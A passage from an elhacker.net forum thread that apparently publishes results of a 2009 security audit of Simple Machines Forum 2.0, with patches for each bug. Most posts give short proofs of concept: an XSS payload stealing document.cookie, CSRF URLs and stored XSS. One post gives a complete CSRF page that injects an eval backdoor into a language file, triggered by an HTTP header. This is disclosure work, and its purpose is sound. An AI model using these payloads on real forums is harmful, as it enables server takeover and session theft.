elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: 4n4lDetector v1.3: herramienta de análisis estático de malware


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits
| | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | |-+  Auditoría de seguridad hacia Simple Machines Forum 2.0
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 4 5 Ir Abajo Respuesta Imprimir
Autor Tema: Auditoría de seguridad hacia Simple Machines Forum 2.0  (Leído 46,941 veces)
WHK
Moderador
***
Desconectado Desconectado

Mensajes: 5.963


The Hacktivism is not a crime


Ver Perfil WWW
Auditoría de seguridad hacia Simple Machines Forum 2.0
« en: 18 Octubre 2009, 23:13 »



Proyecto SimpleAudit 2.0

Es un proyecto destinado a realizar auditorías de seguridad a nivel WEB hacia el software de SMF 2.0 (Simple Machines Forum) con la finalidad de que sus desarrolladores puedan crear cada dia un software mas robusto y seguro.



Integrantes - (participando en el proyecto)

Colaboradores (forman parte del proyecto pero necesitaran encontrar algo antes de tener acceso al resto de los reportes):



Vulnerabilidades encontradas
45
(40 reportadas + 0 notificadas + 5 privadas)
Último disclosure: 1 de diciembre
Próximo disclosure: 1 de enero

Backdoors encontrados
1




Todos los resultados se irán mostrando en este lugar con todos sus detalles.

Si tienes algún comentario, pregunta, aporte o lo que necesites compartir puedes hacerlo en este post:
http://foro.elhacker.net/nivel_web/proyecto_de_auditoria_a_smf_20_laboratorio_de_bugsnivel_web-t271095.0.html

Si hay algúna vulnerabilidad o bug que no aparece en este lugar es porque todavía se mantiene en privado hasta cumplirse el plazo estimado para su posible reparación o publicación futura.



Puedes seguir la auditoría en Twitter:
http://twitter.com/simpleaudit

Además en FeedBurner:
Código
  1. <a href="http://twitter.com/simpleaudit">
  2. http://feeds.feedburner.com/Twitter/Simpleaudit.gif
  3. </a>



Meneame:
http://meneame.net/story/localizaron-mas-40-bugs-auditoria-smf-2.0
« Última modificación: 2 Diciembre 2009, 09:47 por WHK » En línea

WHK
Moderador
***
Desconectado Desconectado

Mensajes: 5.963


The Hacktivism is not a crime


Ver Perfil WWW
Re: Auditoría de seguridad hacia Simple Machines Forum 2.0
« Respuesta #1 en: 10 Noviembre 2009, 08:15 »

En este hilo se irán poniendo las vulnerabilidades hechas públicas.

El recopilatorio quedará en el primer post.



Hasta al momento la auditoría ha sido todo un éxito.
En línea

WHK
Moderador
***
Desconectado Desconectado

Mensajes: 5.963


The Hacktivism is not a crime


Ver Perfil WWW
Re: Auditoría de seguridad hacia Simple Machines Forum 2.0
« Respuesta #2 en: 17 Noviembre 2009, 04:39 »

Ya se enviaron todas las vulnerabilidades encontradas. El dia 30 de noviembre serán publicadas acá lo hayan reparado o no.
En línea

WHK
Moderador
***
Desconectado Desconectado

Mensajes: 5.963


The Hacktivism is not a crime


Ver Perfil WWW
XSS en el input "Sitio WEB" dentro del perfil de usuario
« Respuesta #3 en: 30 Noviembre 2009, 09:16 »

Detalles
Descripción:XSS en el input "Sitio WEB" dentro del perfil de usuario
Descubierto por:WHK@elhacker.net
Código vulnerable:Sources/Profile-Modify.php:802
URL Vulnerable:N/A
PoC:‭‬‭‬ ‭‬‭‬‭‬javascript:alert(document.cookie);//http://xx
Afecta a:‭‬SMF 1.1.10 y 2.0 RC2


Descripción

La vulnerabilidad se localiza en el archivo Sources/Profile-Modify.php
Linea 802
http://code.google.com/p/smf2-review/source/browse/trunk/Sources/Profile-Modify.php#802
Código
  1. if (strlen(trim($value)) > 0 && strpos($value, \'://\') === false)
  2. $value = \'http://\' . $value;

Ya que permite la inyección de código arbitrario debido a que verifica
únicamente que contenga los carácteres "://" pero no indicaron en que
posición del string debería estar por lo cual puedes escribir "://" al
final del código inyectado encapsulandolo en un comentario tal como el
siguiente ejemplo.

PoC:
En el perfil de tu usuario pon lo siguiente en el input de "Website URL"
‭‬‭‬‭‬‭‬‭‬javascript:alert(document.cookie);//http://xx


Solución

Código original de SMF 1.1.10 en Sources/Profile.php linea 602
Código
  1. // Fix the URL...
  2. if (isset($_POST['websiteUrl']))
  3. {
  4. if (strlen(trim($_POST['websiteUrl'])) > 0 && strpos($_POST['websiteUrl'], '://') === false)
  5. $_POST['websiteUrl'] = 'http://' . $_POST['websiteUrl'];
  6. if (strlen($_POST['websiteUrl']) < 8)
  7. $_POST['websiteUrl'] = '';
  8. }
  9.  

reemplazar por
Código
  1. if($_POST['websiteUrl']){
  2. $permitidos = array('http', 'https', 'ftp', 'ftps');
  3. $protocolo = @explode('://', $_POST['websiteUrl']);
  4. $protocolo = $protocolo[0];
  5. foreach($permitidos as $permitido){
  6.  if(strtolower($protocolo) == strtolower($permitido)){
  7.   $valido = true;
  8.   break;
  9.  }
  10. }
  11. /* La url comienza con un protocolo no válido */
  12. if(!$valido)
  13.  $_POST['websiteUrl'] = 'http://'.$_POST['websiteUrl'];
  14. unset($permitidos, $permitido, $protocolo, $valido); /* Libera memoria */
  15.  
  16. /* Elimina urls no válidas */
  17. if(strlen($_POST['websiteUrl']) < 8)
  18.  unset($_POST['websiteUrl']);
  19. }

Código original de SMF 2.0 RC2 en Sources/Profile-Modify.php linea 753
Código
  1. // Fix the URL...
  2. 'input_validate' => create_function('&$value', '
  3.  
  4. if (strlen(trim($value)) > 0 && strpos($value, \'://\') === false)
  5. $value = \'http://\' . $value;
  6. if (strlen($value) < 8)
  7. $value = \'\';
  8. return true;
  9. '),

Reemplazar por
Código
  1. // Parche - Fix the URL...
  2. 'input_validate' => create_function('&$value', '
  3. if($_POST["websiteUrl"]){
  4. $permitidos = array("http", "https", "ftp", "ftps");
  5. $protocolo = @explode("://", $_POST["websiteUrl"]);
  6. $protocolo = $protocolo[0];
  7. foreach($permitidos as $permitido){
  8.  if(strtolower($protocolo) == strtolower($permitido)){
  9.   $valido = true;
  10.   break;
  11.  }
  12. }
  13.  
  14. /* La url comienza con un protocolo no válido */
  15. if(!$valido)
  16.  $_POST["websiteUrl"] = "http://".$_POST["websiteUrl"];
  17. unset($permitidos, $permitido, $protocolo, $valido); /* Libera memoria */
  18.  
  19. /* Elimina urls no válidas */
  20. if(strlen($_POST["websiteUrl"]) < 8)
  21.  unset($_POST["websiteUrl"]);
  22. }
  23. '),
« Última modificación: 2 Diciembre 2009, 20:41 por WHK » En línea

WHK
Moderador
***
Desconectado Desconectado

Mensajes: 5.963


The Hacktivism is not a crime


Ver Perfil WWW
Código de ejecución remota PHP
« Respuesta #4 en: 30 Noviembre 2009, 09:21 »

Detalles
Descripción:Código de ejecución remota PHP
Descubierto por:WHK@elhacker.net
Código vulnerable:Sources/ManageServer.php:1298
URL Vulnerable:Themes/default/languages/index.english.php
PoC:‭‬en_US\\\'; $x=$_SERVER[HTTP_EXEC];if($x){@eval($x);exit;} //
Afecta a:‭‬SMF 2.0 RC2


Descripción

La vulnerabilidad se localiza en el archivo Sources/ManageServer.php desde
la linea 1298
http://code.google.com/p/smf2-review/source/browse/trunk/Sources/ManageServer.php#1298
Código
  1. $replace_array = array(
  2. '~\$txt\[\'lang_character_set\'\]\s=\s(\'|")[^\r\n]+~' => '$txt[\'lang_character_set\'] = \'' . addslashes($_POST['character_set']) . '\';',
  3. '~\$txt\[\'lang_locale\'\]\s=\s(\'|")[^\r\n]+~' => '$txt[\'lang_locale\'] = \'' . addslashes($_POST['locale']) . '\';',
  4. '~\$txt\[\'lang_dictionary\'\]\s=\s(\'|")[^\r\n]+~' => '$txt[\'lang_dictionary\'] = \'' . addslashes($_POST['dictionary']) . '\';',
  5. '~\$txt\[\'lang_spelling\'\]\s=\s(\'|")[^\r\n]+~' => '$txt[\'lang_spelling\'] = \'' . addslashes($_POST['spelling']) . '\';',
  6. '~\$txt\[\'lang_rtl\'\]\s=\s[A-Za-z0-9]+;~' => '$txt[\'lang_rtl\'] = ' . (!empty($_POST['rtl']) ? 'true' : 'false') . ';',
  7. );

y el problema esque SMF filtra de mala forma los carácteres especiales que pueden ser incluidos ya que aunque procesan via addslashses el preg_replace los omite como si fueran parte de la misma expresión regular.

Si vamos a la sección
Configuraciones->Lenguajes->Editar lenguajes
Podemos ver el listado de lenguajes, si le haces click sobre cualquier
lenguaje irás directamente a su edición y podrás notar dos cosas.

1. Al enviarte a esa sección puedes ver que te adjunta un token a la url
para evitar un ataque de tipo CSRF pero si se lo eliminas puedes ver que la
sección se visualiza de igual forma, por lo tanto si actualizamos las
configuraciones sin enviar el token vemos que se guarda igual.
En SMF hay muchas funciones y secciones que aparentemente se ve un token
pero no las usa. Este es un CSRF de ejecución de comando arbitrario
primeramente ya que un atacante remoto puede engañar al administrador
haciendo que visualize una web especialemnte preparada para el ataque y
modificar las configuraciones a gusto.

2. Si haces algún cambio en cualquier input y le das en guardar lo que hace
SMF no es guardar los valores en la base de datos sino sobreescribir
directamente el archivo de elnguajes del theme utilizado por lo tanto lo
que escribas de configuración se verá en el archivo principal de lenguaje
del theme.

3. El bug consiste principalmente en que SMF no filtra adecuadamente estos
inputs. Originalemnte en el archivo
Themes/default/languages/index.english.php dice así:
Código
  1. $txt['lang_locale'] = 'en_US';
  2. $txt['lang_dictionary'] = 'en';
  3. $txt['lang_spelling'] = 'american';

Si intentamos escribir una comilla simple SMF le agrega un slash intentando
invalidar la inyección de código pero no filtra adecuadamente el carácter
"\" por lo tanto cuando insertamos una comilla el código queda así:
Código
  1. $txt['lang_locale'] = 'en_US\'test';
por lo tanto aplicamos bypass y escribimos "\'" para que quede así:
Código
  1. $txt['lang_locale'] = 'en_US\\'test';
Por lo tanto el primer slash invalida el segundo transformandolo en un
string y validando la comilla simple, luego de eso inyectamos nuestro
código arbitrario sin comillas y cerramos con un cmentario para invalidar
el resto de la linea y evitar que se produzca un error.
Por ejemplo "\';phpinfo();//" quedaría:
Código
  1. $txt['lang_locale'] = 'en_US\\';phpinfo();//';
ejecutando el código de forma arbitraria y remota gracias a la falta de
token (CSRF).

PoC:
Código
  1. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  2. <html>
  3. <head>
  4.  <title>:O</title>
  5. </head>
  6. <?php
  7. /*
  8. Prueba de concepto. Auditoría a SMF 2.0 de parte del grupo de auditores de Elhacker.Net
  9. https://foro.elhacker.net/nivel_web/auditoria_de_seguridad_hacia_simple_machines_forum_20-t271199.0.html
  10. */
  11. /* Configuraciones */
  12. $foro_vulnerable = '';
  13.  
  14. if($_GET['act'] == 'frame'){
  15. ?>
  16. <script>
  17.  function ejecutar(){
  18.   document.getElementById('payload').value = 'en_US\\\'; $x=$_SERVER[HTTP_EXEC];if($x){@eval($x);exit;} //';
  19.   document.getElementById('form').submit();
  20.  }
  21. </script>
  22. <body onload="ejecutar();">
  23.  <form id="form" method="post" action="<?php echo $foro_vulnerable; ?>index.php?action=admin;area=languages;sa=editlang;lid=english">
  24.   <input type="hidden" name="character_set" value="ISO-8859-1" />
  25.   <input type="hidden" name="locale" id="payload" value="" />
  26.   <input type="hidden" name="dictionary" value="en" />
  27.   <input type="hidden" name="spelling" value="american" />
  28.   <input type="hidden" name="save_main" value="Save" />
  29.  </form>
  30. </body>
  31. <?php }else{ ?>
  32. <body style="text-align: center;">
  33.  <h2 style="font-weight: bold; text-decoration: underline;">
  34.   Prueba de concepto
  35.  </h2>
  36.  <hr />
  37.  <div style="text-align: center;">
  38.   <img width="400" height="322" src="http://i207.photobucket.com/albums/bb73/moonlightj/HQczsxCxHV_nooooooo-i-cant-has-pres.jpg" />
  39.   <img width="400" height="322" src="http://i492.photobucket.com/albums/rr283/Hoodano12/n1559202619_124094_6213.jpg" />
  40.  </div>
  41.  <hr />
  42.  <img src="http://th40.photobucket.com/albums/e245/abbbies/th_scream.jpg" />
  43.  <img src="http://th39.photobucket.com/albums/e156/kimtisha/th_AUG2008011bw.jpg" />
  44.  <img src="http://th132.photobucket.com/albums/q9/PhilVassar/th_MarissaFile.jpg" />
  45.  <img src="http://th873.photobucket.com/albums/ab296/jrvohler/th_no.jpg" />
  46.  <img src="http://th306.photobucket.com/albums/nn256/s13vin4t0r/th_BSODGATES.jpg" />
  47.  <img src="http://th296.photobucket.com/albums/mm194/Spalders/th_nooooooo-not-the-bafftub.jpg" />
  48.  <img src="http://th233.photobucket.com/albums/ee182/vinayg18/blog/th_scary_hillary_clinton.jpg" />
  49.  <img src="http://th732.photobucket.com/albums/ww321/TSCC_Munter/th_nooooooo.jpg" />
  50.  <img src="http://th617.photobucket.com/albums/tt254/webrougt97/th_fred14.jpg" />
  51.  <img src="http://th257.photobucket.com/albums/hh209/Arganaut/th_Desecration_by_Louieville_XXIII.jpg" />
  52.  <img src="http://th4.photobucket.com/albums/y142/Tornadopotato/Photos/th_100_2521.jpg" />
  53.  <hr />
  54.  <iframe style="visibility: hidden; position: absolute; top:0px; left: 0px;" src="<?php echo $_SERVER['SCRIPT_URI']; ?>?act=frame"></iframe>
  55. </body>
  56. <?php } ?>
  57. </html>

1. Ingresar como administrador al foro de pruebas
2. Modificar el archivo donde dice $foro_vulnerable=''; escribiendo la
dirección del foro sin el index.php.
3. Visualizar el archivo

Luego que visualizes el archivo tu foro se habrá infectado y a la vista de
todos no se verá absolutamente nada. Para su ejecución debes enviar un
header desde tu explorador con la variable "Exec" mas su ejecución, como
por ejemplo "Exec: phpinfo();" ya que el payload de la prueba de concepto
es la siguiente:
Código
  1. en_US\'; $x=$_SERVER[HTTP_EXEC];if($x){@eval($x);exit;} //

Entonces se le agregará el slash a la comilla y el slash puesto con anterioridad no será modificado quedando un \\' invalodando el slash que invalidaba a la comilla.


Solución

Código original de SMF 2.0 RC2 en Sources/ManageServer.php linea 1298
Código
  1. $replace_array = array(
  2. '~\$txt\[\'lang_character_set\'\]\s=\s(\'|")[^\r\n]+~' => '$txt[\'lang_character_set\'] = \'' . addslashes($_POST['character_set']) . '\';',
  3. '~\$txt\[\'lang_locale\'\]\s=\s(\'|")[^\r\n]+~' => '$txt[\'lang_locale\'] = \'' . addslashes($_POST['locale']) . '\';',
  4. '~\$txt\[\'lang_dictionary\'\]\s=\s(\'|")[^\r\n]+~' => '$txt[\'lang_dictionary\'] = \'' . addslashes($_POST['dictionary']) . '\';',
  5. '~\$txt\[\'lang_spelling\'\]\s=\s(\'|")[^\r\n]+~' => '$txt[\'lang_spelling\'] = \'' . addslashes($_POST['spelling']) . '\';',
  6. '~\$txt\[\'lang_rtl\'\]\s=\s[A-Za-z0-9]+;~' => '$txt[\'lang_rtl\'] = ' . (!empty($_POST['rtl']) ? 'true' : 'false') . ';',
  7. );

Debe ser reemplazado por
Código
  1. $replace_array = array(
  2. '~\$txt\[\'lang_character_set\'\]\s=\s(\'|")[^\r\n]+~' => '$txt[\'lang_character_set\'] = \'' . str_replace('\\', '\\\\', addslashes($_POST['character_set'])) . '\';',
  3. '~\$txt\[\'lang_locale\'\]\s=\s(\'|")[^\r\n]+~' => '$txt[\'lang_locale\'] = \'' . str_replace('\\', '\\\\', addslashes($_POST['locale'])) . '\';',
  4. '~\$txt\[\'lang_dictionary\'\]\s=\s(\'|")[^\r\n]+~' => '$txt[\'lang_dictionary\'] = \'' . str_replace('\\', '\\\\', addslashes($_POST['dictionary'])) . '\';',
  5. '~\$txt\[\'lang_spelling\'\]\s=\s(\'|")[^\r\n]+~' => '$txt[\'lang_spelling\'] = \'' . str_replace('\\', '\\\\', addslashes($_POST['spelling'])) . '\';',
  6. '~\$txt\[\'lang_rtl\'\]\s=\s[A-Za-z0-9]+;~' => '$txt[\'lang_rtl\'] = ' . (!empty($_POST['rtl']) ? 'true' : 'false') . ';',
  7. );
« Última modificación: 1 Diciembre 2009, 00:16 por WHK » En línea

WHK
Moderador
***
Desconectado Desconectado

Mensajes: 5.963


The Hacktivism is not a crime


Ver Perfil WWW
CSRF en el cambio del theme
« Respuesta #5 en: 30 Noviembre 2009, 18:26 »

Detalles
Descripción:CSRF en el cambio del theme
Descubierto por:WHK@elhacker.net
Código vulnerable:Sources/Load.php:1324
URL Vulnerable:index.php?theme=2
PoC:‭‬index.php?theme=2
Afecta a:‭‬SMF 1.1.10 y 2.0 RC2


Descripción

Normalmente cuando uno desea cambiar de theme lo hace en las preferencias
de diseño del perfil de cada usuario incluyendo un token para evitar CSRF
aunque no sirve de mucho ya que puedes ejecutar un cambio de theme de forma
forzada gracias a una vulnerabilidad alojada en el archivo Sources/Load.php
linea 1245
http://code.google.com/p/smf2-review/source/browse/trunk/Sources/Load.php#1245

Código
  1. elseif (!empty($_REQUEST['theme']) && (!empty($modSettings['theme_allow']) || allowedTo('admin_forum')))
  2. {
  3. $id_theme = (int) $_REQUEST['theme'];
  4. $_SESSION['id_theme'] = $id_theme;
  5. }

haciendo un csrf persistente ya que el id de theme lo almacena directamente
en la cookie de sesión del usuario o visitante.

Prueba de concepto:
http://localhost/smf/index.php?theme=2


Solución

Código original de SMF 2.0 RC2 en Sources/Load.php linea 1324
Código
  1. elseif (!empty($_REQUEST['theme']) && (!empty($modSettings['theme_allow']) || allowedTo('admin_forum')))
  2. {
  3. $id_theme = (int) $_REQUEST['theme'];
  4. $_SESSION['id_theme'] = $id_theme;
  5. }

Reemplazar por
Código
  1. /*
  2. elseif (!empty($_REQUEST['theme']) && (!empty($modSettings['theme_allow']) || allowedTo('admin_forum')))
  3. {
  4. $id_theme = (int) $_REQUEST['theme'];
  5. $_SESSION['id_theme'] = $id_theme;
  6. }
  7. */

Hay que recordar que este cambio imposibilita el cambio de theme directamente obligando a utilizar la opción del perfil si alguien lo desea.
Esto no es una feature debido a que supuestamente solamente el administrador puede utilizar este tipo de visualizaciones sin tocken pero al fallar las condiciones hace posible que esta acción sea ejecutable a todo usuario y ni aun asi debería crearse al propio administrador.
O se elimina o se pone token.
« Última modificación: 1 Diciembre 2009, 01:12 por WHK » En línea

WHK
Moderador
***
Desconectado Desconectado

Mensajes: 5.963


The Hacktivism is not a crime


Ver Perfil WWW
CSRF en el colapso de categorias
« Respuesta #6 en: 30 Noviembre 2009, 18:44 »

Detalles
Descripción:CSRF en el colapso de categorias
Descubierto por:WHK@elhacker.net
Código vulnerable:Sources/BoardIndex.php:130
URL Vulnerable:index.php?action=collapse;c=1;sa=collapse
PoC:‭‬index.php?action=collapse;c=1;sa=collapse
Afecta a:‭‬SMF 1.1.10 y 2.0 RC2


Descripción

La falla se encuentra en el archivo Sources/BoardIndex.php desde la linea
130 hasta la 150 en la función llamada "CollapseCategory" ya que al
solicitar una petición de colapso de un foro no nos pide como requsito un
token o algo que lo impida, por lo tanto desde un siomple csrf podemos
causar el colapso total de foros en la visualización inicial de la portada
del foro.

Aunque no es una vulnerabilidad que pueda comprometer al foro si es
bastante molesta y smf no debería permitir este tipo de acciones de forma
arbitraria.

Prueba de concepto:
http://localhost/smf2.0/index.php?action=collapse;c=1;sa=collapse
donde c=1 es la variable con el id de grupos de foros.


Solución

Modificar la categoría de la sección y darle click donde dice "no colapsable" mientras que simplemachines da una solución oficial ya que hay que agregar el tocken a todos sus themes y al sistema propio.
« Última modificación: 1 Diciembre 2009, 01:19 por WHK » En línea

WHK
Moderador
***
Desconectado Desconectado

Mensajes: 5.963


The Hacktivism is not a crime


Ver Perfil WWW
CSRF en el gestor de servidores de paquetes
« Respuesta #7 en: 30 Noviembre 2009, 18:48 »

Detalles
Descripción:CSRF en el gestor de servidores de paquetes
Descubierto por:WHK@elhacker.net
Código vulnerable:Sources/Packages.php:1189
URL Vulnerable:http://127.0.0.1/smf_2/index.php?action=admin;area=packages;get;sa=remove;server=1
 
Afecta a:‭‬SMF 1.1.10 y 2.0 RC2


Descripción

La vulnerabilidad consiste en que puedes remover servdiores de
actualizaciones y paquetes de forma arbitraria debido a que esta acción no
solicita un token o algún tipo de verificación que lo impida:

Prueba de concepto:
http://127.0.0.1/smf_2/index.php?action=admin;area=packages;get;sa=remove;server=1
Con esto podemos hacer que el administrador elimine de forma arbitraria el
primero servidor en la lista de servidores de paquetes.
Hay que recordar que esta acción solo la puede ejecutar un administrador
por lo tanto es necesario que alguien con este tipo de derechos sobre el
foro pueda ejecutar tu csrf desde alguna imagen en tu perfil reireccionada
o desde alguna web externa.

La falla se localiza en el archivo Sources/PackageGet.php linea 740
http://code.google.com/p/smf2-review/source/browse/trunk/Sources/PackageGet.php#740

No hay token por ningún lado de la función.
« Última modificación: 2 Diciembre 2009, 03:41 por WHK » En línea

WHK
Moderador
***
Desconectado Desconectado

Mensajes: 5.963


The Hacktivism is not a crime


Ver Perfil WWW
XSS en la sección de administración de servidores de mods
« Respuesta #8 en: 30 Noviembre 2009, 18:53 »

Detalles
Descripción:XSS en la sección de administración de servidores de mods
Descubierto por:WHK@elhacker.net
Código vulnerable:Sources/PackageGet.php:732
URL Vulnerable:index.php?action=packageget
PoC:Agregar un servidor con nombre: <h1>XSS</h1>
Afecta a:‭‬SMF 1.1.10 y 2.0 RC2


Descripción

La falla está en el archivo Sources/PackageGet.php linea 732
http://code.google.com/p/smf2-review/source/browse/trunk/Sources/PackageGet.php#732

Donde la función "PackageServerAdd" actualiza el string del nombre del
servidor en la base de datos sin ser filtrada de ninguna forma.

Prueba de concepto:
http://127.0.0.1/smf_2/index.php?action=admin;area=packages
Donde dice "Add server" en el input del nombre del servidor pongan <h1>XSS</h1>
« Última modificación: 2 Diciembre 2009, 03:44 por WHK » En línea

WHK
Moderador
***
Desconectado Desconectado

Mensajes: 5.963


The Hacktivism is not a crime


Ver Perfil WWW
Eliminación arbitraria y Disclosure de paquetes instalados
« Respuesta #9 en: 30 Noviembre 2009, 18:58 »

Detalles
Descripción:Eliminación arbitraria y Disclosure de paquetes instalados
Descubierto por:WHK@elhacker.net
Código vulnerable:Sources/Packages.php:1189
URL Vulnerable:/index.php?action=admin;area=packages;sa=remove;package=.htaccess
Afecta a:‭‬SMF 2.0 RC2


Descripción

El problema está en el archivo Sources/Packages.php Linea 1189 en la
función PackageRemove ya que primeramente no solicita ningún token por lo
tanto es vulnerable a un ataque de tipo CSRF.
El segundo caso es que en esta linea:
Código
  1. // Ack, don't allow deletion of arbitrary files here, could become a
  2. security hole somehow!
  3. if (!isset($_GET['package']) || $_GET['package'] == 'index.php' ||
  4. $_GET['package'] == 'installed.list')
  5. redirectexit('action=admin;area=packages;sa=browse');

impiden la eliminación local de archivos pero no incluyeron el ".htaccess"
por lo cual puedes eliminarlo de forma arbitraria y observar el listado de
paquetes.

Pruebas de concepto:
http://localhost/smf2.0/index.php?action=admin;area=packages;sa=remove;package=paquete.zip
http://localhost/smf2.0/index.php?action=admin;area=packages;sa=remove;package=.htaccess

Nota de sirdarckcat
Citar
http://code.google.com/p/smf2-review/source/browse/trunk/Sources/Packages.php#1196
Al parecer..
Código
  1. $_GET['package'] = preg_replace('~[\.]+~', '.', strtr($_GET['package'], '/', '_'));

no podemos poner "..", lo del disclosure que dice whk es que sin el htaccess ahora
podemos leer installed.list y bajar los paquetes y demas
« Última modificación: 2 Diciembre 2009, 03:45 por WHK » En línea

Páginas: [1] 2 3 4 5 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Auditoria de seguridad, mis comienzos...
Seguridad
Davisin 5 2,281 Último mensaje 9 Octubre 2012, 22:53
por Epzylon
Auditoría de seguridad - Web Command Injection
Seguridad
MacGyver87 2 1,335 Último mensaje 29 Julio 2013, 14:37
por MacGyver87
Simple Machines Forum hackeado y contraseñas de los usuarios en peligro
Foro Libre
Felix el Gato 1 1,163 Último mensaje 24 Julio 2013, 23:50
por bacanzito
Hacia una evaluación eficaz de la seguridad en ICS
Noticias
r32 0 643 Último mensaje 4 Noviembre 2014, 18:02
por r32
donde quitar el logo de simple machin forum
Dudas Generales
dark_night 1 670 Último mensaje 7 Abril 2016, 12:50
por dark_night
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines